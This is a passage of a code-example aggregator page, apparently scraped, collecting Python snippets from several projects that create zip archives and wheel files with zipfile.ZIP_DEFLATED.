        output_line('creating zip %s ...' % (zip_name))
        zip_f = zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED)
        for fn in CREATED_FILES:
            fne = fn.encode(OUT_FILE_ENCODING)
            #print('storing %s...' % (fne))
            zip_f.write(fne)
            os.remove(fne)
        zip_f.close()
        clean_up()
项目:code    作者:ActiveState    | 项目源码 | 文件源码
def archive_dir(source, arcname, target, arc_time):
    # Set the filename and destination.
    arcname  = str(arc_time)+'_'+arcname+'.zip'  # Archive filename
    target   = str(target+'/'+arcname)           # Path to storage...

    dirs = [str(source)] # Set initial "root" directories to pop.
    zipObj = zipfile.ZipFile(target,'w',zipfile.ZIP_DEFLATED)

    try:
        while dirs:
            # Loop through and get all sub dirs and files.
            dir_list=dirs.pop(0) # pop next dir.
            try:
                for items in os.listdir(dir_list+'/'):
                    if os.path.isdir(dir_list+'/'+items):
                        # Collect sub dirs for pop.
                        dirs+=[dir_list+'/'+items]
                    elif os.path.isfile(dir_list+'/'+items):
                        # Ignor the archive file if in the dir structure.
                        if items.lower() == arcname: continue
                        if items.lower()[:3] == 'ini': continue #task directory filter.
                        # Write to the zip.
                        zipObj.write(str(dir_list+'/'+items),None,None)
            except:
                pass # Ignor non-accessable directories!

        zipObj.close()
        return 1 # Success...

    except Exception, error:
        return error # Backup failed...

#//////////////////////////////////////////////////////>
# CONFIGURATION AND PATH SETUPS
#//////////////////////////////////////////////////////>

# SPECIFY SOURCE PATHS; add as many as you like.
# Don't forget to add these to the SOURCE_PATH list below.
项目:code    作者:ActiveState    | 项目源码 | 文件源码
def append(self, pathAndFileName):
        """ adding a file or a path (recursive) to the zip archive in memory """
        zf = zipfile.ZipFile(self.inMemory, "a", zipfile.ZIP_DEFLATED, False)

        if os.path.isfile(pathAndFileName):
            zf.write(pathAndFileName)
        else:
            path = pathAndFileName
            for root, folders, files in os.walk(path):
                for file in files:
                    fullName = os.path.join(root, file)
                    zf.write(fullName)
项目:TACTIC-Handler    作者:listyque    | 项目源码 | 文件源码
def create_update_archive(archive_path):
    zp = zipfile.ZipFile(archive_path, 'w', compression=zipfile.ZIP_DEFLATED)
    files_list = create_app_update_list()
    abs_path = env_mode.get_current_path()

    for fl in files_list:
        fl_rep = fl.replace
        zp.write(fl, arcname=fl_rep(abs_path, ''))
    zp.close()
项目:FRG-Crowdsourcing    作者:97amarnathk    | 项目源码 | 文件源码
def _zip_factory(self, filename):
        """create a ZipFile Object with compression and allow big ZIP files (allowZip64)"""
        try:
            import zlib
            assert zlib
            zip_compression= zipfile.ZIP_DEFLATED
        except Exception as ex:
            zip_compression= zipfile.ZIP_STORED
        _zip = zipfile.ZipFile(file=filename, mode='w', compression=zip_compression, allowZip64=True)
        return _zip
项目:swjtu-pyscraper    作者:Desgard    | 项目源码 | 文件源码
def build_zip(self, pathname, archive_paths):
        with ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED) as zf:
            for ap, p in archive_paths:
                logger.debug('Wrote %s to %s in wheel', p, ap)
                zf.write(p, ap)
项目:swjtu-pyscraper    作者:Desgard    | 项目源码 | 文件源码
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True,
                 mode='w'):
    """Create a zip file from all the files under 'base_dir'.  The output
    zip file will be named 'base_dir' + ".zip".  Uses either the "zipfile"
    Python module (if available) or the InfoZIP "zip" utility (if installed
    and found on the default search path).  If neither tool is available,
    raises DistutilsExecError.  Returns the name of the output zip file.
    """
    import zipfile

    mkpath(os.path.dirname(zip_filename), dry_run=dry_run)
    log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)

    def visit(z, dirname, names):
        for name in names:
            path = os.path.normpath(os.path.join(dirname, name))
            if os.path.isfile(path):
                p = path[len(base_dir) + 1:]
                if not dry_run:
                    z.write(path, p)
                log.debug("adding '%s'", p)

    compression = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED
    if not dry_run:
        z = zipfile.ZipFile(zip_filename, mode, compression=compression)
        for dirname, dirs, files in os.walk(base_dir):
            visit(z, dirname, files)
        z.close()
    else:
        for dirname, dirs, files in os.walk(base_dir):
            visit(None, dirname, files)
    return zip_filename
项目:noc-orchestrator    作者:DirceuSilvaLabs    | 项目源码 | 文件源码
def build_zip(self, pathname, archive_paths):
        with ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED) as zf:
            for ap, p in archive_paths:
                logger.debug('Wrote %s to %s in wheel', p, ap)
                zf.write(p, ap)
项目:noc-orchestrator    作者:DirceuSilvaLabs    | 项目源码 | 文件源码
def make_wheelfile_inner(base_name, base_dir='.'):
    """Create a whl file from all the files under 'base_dir'.

    Places .dist-info at the end of the archive."""

    zip_filename = base_name + ".whl"

    log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)

    # XXX support bz2, xz when available
    zip = zipfile.ZipFile(open(zip_filename, "wb+"), "w",
                          compression=zipfile.ZIP_DEFLATED)

    score = {'WHEEL': 1, 'METADATA': 2, 'RECORD': 3}
    deferred = []

    def writefile(path):
        zip.write(path, path)
        log.info("adding '%s'" % path)

    for dirpath, dirnames, filenames in os.walk(base_dir):
        for name in filenames:
            path = os.path.normpath(os.path.join(dirpath, name))

            if os.path.isfile(path):
                if dirpath.endswith('.dist-info'):
                    deferred.append((score.get(name, 0), path))
                else:
                    writefile(path)

    deferred.sort()
    for score, path in deferred:
        writefile(path)

    zip.close()

    return zip_filename
项目:noc-orchestrator    作者:DirceuSilvaLabs    | 项目源码 | 文件源码
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True,
                 mode='w'):
    """Create a zip file from all the files under 'base_dir'.  The output
    zip file will be named 'base_dir' + ".zip".  Uses either the "zipfile"
    Python module (if available) or the InfoZIP "zip" utility (if installed
    and found on the default search path).  If neither tool is available,
    raises DistutilsExecError.  Returns the name of the output zip file.
    """
    import zipfile

    mkpath(os.path.dirname(zip_filename), dry_run=dry_run)
    log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)

    def visit(z, dirname, names):
        for name in names:
            path = os.path.normpath(os.path.join(dirname, name))
            if os.path.isfile(path):
                p = path[len(base_dir) + 1:]
                if not dry_run:
                    z.write(path, p)
                log.debug("adding '%s'" % p)

    compression = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED
    if not dry_run:
        z = zipfile.ZipFile(zip_filename, mode, compression=compression)
        for dirname, dirs, files in os.walk(base_dir):
            visit(z, dirname, files)
        z.close()
    else:
        for dirname, dirs, files in os.walk(base_dir):
            visit(None, dirname, files)
    return zip_filename